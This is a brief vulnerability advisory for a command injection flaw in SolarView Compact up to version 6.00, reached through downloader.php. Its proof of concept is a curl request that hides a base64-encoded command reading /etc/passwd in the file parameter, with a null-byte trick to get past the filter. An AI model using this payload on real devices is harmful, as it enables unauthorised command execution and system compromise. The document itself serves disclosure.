Summary:
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Vendor:
- SolarView Compact
Affected Product:
- SolarView Compact
Version:
- SolarView Compact <=ver 6.00
poc:
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
Details:
Commands can be injected by bypassing internal restrictions by accessing the file parameter of the downloader.php page.
